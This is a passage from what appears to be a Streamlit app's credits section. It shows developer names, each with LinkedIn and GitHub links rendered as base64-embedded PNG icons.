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)](https://www.linkedin.com/in/sarperyilmaz/)") 
st.markdown("[![Foo](data:image/png;base64,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)](https://github.com/sarperyilm
az)") with col7: st.markdown("<b><i>Doğukan Doğru</i></b>", unsafe_allow_html=True) st.markdown("[![Foo](data:image/png;base64,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)](https://www.linkedin.com/in/do%C4%9Fukando%C4%9Fru/)") 
st.markdown("[![Foo](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAYAAABXAvmHAAAAAXNSR0IArs4c6QAACepJREFUaEO9WntwXFUZ/33n7gZM7i6ltLaCQ4Vm76ZFaiHdu03Loz6YIgoyQCl1KIijlKEgICD44ik4aEEoDo8OKoLQVuAPEYHBUQsI7e4mlJelu5tWqli0BJjsvUnaZO/5nHN2b9gke7ObNOH+leSc8zvf73ud73wnhAn4mo5IzqCwXALGQiJqYYkjIXg6MTUBICZ2wegCaCcEZYXkLV6Y/9azLfPf/d2exgsQnds2VRblCgavFICtBB0zFiNDhIdYYL2zPf3+mNePZ9PG+OJDDW/gSklYJQhKw/v9SUaPIKzzKLymN/vS7rEA1q+11tZwpGBcLoHrRwrOfUz8IrF4niC3kuSckOj6cGdHtxJmanMy6pE3jQVZzJjPTEsgcDwxGiuF1USAG52odyc6OgbqIVIXgeicZEx6vJGAY4ZsCKQE830HiIYnurIvOfVs6M+ZPneJubfYeyYTVhGjrXItE78iiqHlhR2bO2th1iQQsezTmfkhIooMgkm0s4Fr3Gz6r7U2qGfcjCc/T5JvAyHhz2dwgUic52RTfxgNY1QCEcv+FsD3AWQoECb0gul7bi51LwBZj3BjmCPMeGIVS/r5Ry7KHkAXObn0A0E4gQRKwmPdYKAzbWeWZ7mdmX+MQagxTzWbk3NJeI8DYk55MQO4MIhEVQLKbQB+fFDzwMsiZJxa2Lb5gzFLNI4FBx193MFyb